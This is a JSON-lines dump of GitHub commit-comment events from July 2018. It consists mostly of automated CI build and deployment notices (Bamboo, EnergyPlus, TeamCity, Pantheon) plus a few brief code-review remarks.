{"id":"7924912973","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611545,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T18:40:37Z","updated_at":"2018-07-05T18:40:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:40:37Z"}
{"id":"7924914924","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611551,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-05T18:41:04Z","updated_at":"2018-07-05T18:41:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:41:04Z"}
{"id":"7924916423","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611553,"position":115,"line":115,"path":"components/addScreen/AddRecipeScreen.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:41:23Z","updated_at":"2018-07-05T18:41:23Z","author_association":"NONE","body":"Когда map-ишь компонент, у компонента ОБЯЗАТЕЛЬНО должен быть prop `key`. `key` должен быть уникальным string или number."}},"created_at":"2018-07-05T18:41:23Z"}
{"id":"7924917095","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29611554,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T18:41:32Z","updated_at":"2018-07-05T18:41:32Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2927 of 2929 tests passed, 11 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T18:41:32Z"}
{"id":"7924918037","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611555,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-05T18:41:44Z","updated_at":"2018-07-05T18:41:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:41:44Z"}
{"id":"7924918481","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611556,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-05T18:41:50Z","updated_at":"2018-07-05T18:41:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:41:50Z"}
{"id":"7924919423","type":"CommitCommentEvent","actor":{"login":"OKA852"},"repo":{"name":"Syfix-Studios/Explorio"},"payload":{"comment":{"id":29611560,"position":null,"line":null,"path":null,"commit_id":"89d1edd8ca2370fb06c57dd6b75469456ba835c5","created_at":"2018-07-05T18:42:03Z","updated_at":"2018-07-05T18:42:03Z","author_association":"NONE","body":"Can u type this in the About the Game:\r\n\r\n1. Start of in the middle of nowhere.\r\n2. Get resources and build a home\r\n3.Upgrade your home and your weapons\r\n4. Craft materials like metal to build electricity, robots, electric fences Etc.\r\n5.Explore the land and find survivors.\r\n6.Fight bosses in caves, mountains, waterfalls and at night time\r\n7.Create portals to different dimensions and explore and conquer the land.                                                               \r\n"}},"created_at":"2018-07-05T18:42:03Z"}
{"id":"7924920248","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611563,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-05T18:42:13Z","updated_at":"2018-07-05T18:42:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:42:13Z"}
{"id":"7924923205","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611571,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-05T18:42:52Z","updated_at":"2018-07-05T18:42:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:42:52Z"}
{"id":"7924923221","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29611572,"position":7,"line":54,"path":"src/index.js","commit_id":"a4cb2dfb71ab15edab75aa0e6688610837f01462","created_at":"2018-07-05T18:42:52Z","updated_at":"2018-07-05T18:42:52Z","author_association":"OWNER","body":"Got it (y)\n\nOn Thu, Jul 5, 2018 at 7:39 PM, Hideya Swider <notifications@github.com>\nwrote:\n\n> Adding the extra e variable here in unnecessary. In Javascript, you don't\n> have to obey to the function's skeleton.\n> So, handleRemove={() => this.handleRemove(task)} should work perfectly,\n> and you won't need to allocate any memory for e.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ImenBenA/Tasks/commit/a4cb2dfb71ab15edab75aa0e6688610837f01462#commitcomment-29611518>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AihdtpsE85b81EDFvCXLMhVGHnJN-ZWTks5uDl1agaJpZM4VEW51>\n> .\n>\n"}},"created_at":"2018-07-05T18:42:52Z"}
{"id":"7924923988","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611573,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-05T18:43:02Z","updated_at":"2018-07-05T18:43:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:43:02Z"}
{"id":"7924925191","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611578,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-05T18:43:18Z","updated_at":"2018-07-05T18:43:18Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-05T18:43:18Z"}
{"id":"7924925569","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611579,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-05T18:43:23Z","updated_at":"2018-07-05T18:43:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:43:23Z"}
{"id":"7924927223","type":"CommitCommentEvent","actor":{"login":"mbilsky"},"repo":{"name":"mbilsky/TeensyADS1256"},"payload":{"comment":{"id":29611586,"position":null,"line":null,"path":null,"commit_id":"670666434af511a9fcd46603276b67436747351d","created_at":"2018-07-05T18:43:43Z","updated_at":"2018-07-05T18:43:43Z","author_association":"OWNER","body":"fixed error with line 127 where 0 was replaced by beta. error is also present in original flydroid library"}},"created_at":"2018-07-05T18:43:43Z"}
{"id":"7924929910","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611599,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-05T18:44:15Z","updated_at":"2018-07-05T18:44:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:44:15Z"}
{"id":"7924931324","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611604,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-05T18:44:34Z","updated_at":"2018-07-05T18:44:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:44:34Z"}
{"id":"7924932481","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611609,"position":3,"line":3,"path":"components/addScreen/index.ts","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:44:50Z","updated_at":"2018-07-05T18:44:50Z","author_association":"NONE","body":"export { AddRecipeScreen };"}},"created_at":"2018-07-05T18:44:50Z"}
{"id":"7924933660","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29611615,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-05T18:45:06Z","updated_at":"2018-07-05T18:45:06Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-MacOS-10.9-clang: OK (2930 of 2930 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T18:45:06Z"}
{"id":"7924936368","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611624,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T18:45:42Z","updated_at":"2018-07-05T18:45:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:45:42Z"}
{"id":"7924936527","type":"CommitCommentEvent","actor":{"login":"mattatobin"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29611626,"position":null,"line":null,"path":null,"commit_id":"39c7be96de7deb2a6929d6b61013e8ad177ea8ba","created_at":"2018-07-05T18:45:45Z","updated_at":"2018-07-05T18:45:45Z","author_association":"MEMBER","body":"@JustOff "}},"created_at":"2018-07-05T18:45:45Z"}
{"id":"7924939244","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29611631,"position":null,"line":null,"path":null,"commit_id":"43c11d238b39d9221e451351fa6ba0c2914b0efe","created_at":"2018-07-05T18:46:20Z","updated_at":"2018-07-05T18:46:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-126](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-126).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-126-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T18:46:20Z"}
{"id":"7924942343","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29611638,"position":278,"line":278,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:46:59Z","updated_at":"2018-07-05T18:46:59Z","author_association":"NONE","body":"if not"}},"created_at":"2018-07-05T18:46:59Z"}
{"id":"7924944411","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29611647,"position":null,"line":null,"path":null,"commit_id":"167c109cb018adc7f7f0b2b5405ac9e560b7eea9","created_at":"2018-07-05T18:47:26Z","updated_at":"2018-07-05T18:47:26Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T18:47:26Z"}
{"id":"7924944623","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29611648,"position":280,"line":280,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:47:29Z","updated_at":"2018-07-05T18:47:29Z","author_association":"NONE","body":"don't print and log, the console level should be set to show info messages"}},"created_at":"2018-07-05T18:47:29Z"}
{"id":"7924946506","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29611657,"position":80,"line":80,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T18:47:54Z","updated_at":"2018-07-05T18:47:54Z","author_association":"MEMBER","body":"i really don't agree but i will change it anyways"}},"created_at":"2018-07-05T18:47:54Z"}
{"id":"7924947617","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29611663,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-05T18:48:09Z","updated_at":"2018-07-05T18:48:09Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 44](https://teamcity.otenv.com/viewLog.html?buildId=8869920&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:48:09Z"}
{"id":"7924948361","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611665,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:48:17Z","updated_at":"2018-07-05T18:48:17Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 152](https://teamcity.otenv.com/viewLog.html?buildId=8869927&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-05T18:48:17Z"}
{"id":"7924950113","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29611698,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-05T18:48:40Z","updated_at":"2018-07-05T18:48:40Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 44](https://teamcity.otenv.com/viewLog.html?buildId=8869920&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 7 Build time: 00:00:30"}},"created_at":"2018-07-05T18:48:40Z"}
{"id":"7924951314","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611720,"position":27,"line":27,"path":"components/detailsScreen/RecipeDetailsScreen.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:48:55Z","updated_at":"2018-07-05T18:48:55Z","author_association":"NONE","body":"React.Component<{}, CreateState>\r\n\r\nпервый аргумент у Component-а Props, второй State"}},"created_at":"2018-07-05T18:48:55Z"}
{"id":"7924953006","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611762,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:18Z","updated_at":"2018-07-05T18:49:18Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 229](https://teamcity.otenv.com/viewLog.html?buildId=8870015&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:18Z"}
{"id":"7924953018","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611763,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:18Z","updated_at":"2018-07-05T18:49:18Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 229](https://teamcity.otenv.com/viewLog.html?buildId=8870015&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-05T18:49:18Z"}
{"id":"7924953155","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611765,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:19Z","updated_at":"2018-07-05T18:49:19Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 230](https://teamcity.otenv.com/viewLog.html?buildId=8870135&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:49:19Z"}
{"id":"7924953236","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611766,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:21Z","updated_at":"2018-07-05T18:49:21Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 231](https://teamcity.otenv.com/viewLog.html?buildId=8870136&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:21Z"}
{"id":"7924953247","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611767,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:21Z","updated_at":"2018-07-05T18:49:21Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 230](https://teamcity.otenv.com/viewLog.html?buildId=8870135&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:21Z"}
{"id":"7924953258","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611769,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:21Z","updated_at":"2018-07-05T18:49:21Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 231](https://teamcity.otenv.com/viewLog.html?buildId=8870136&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:49:21Z"}
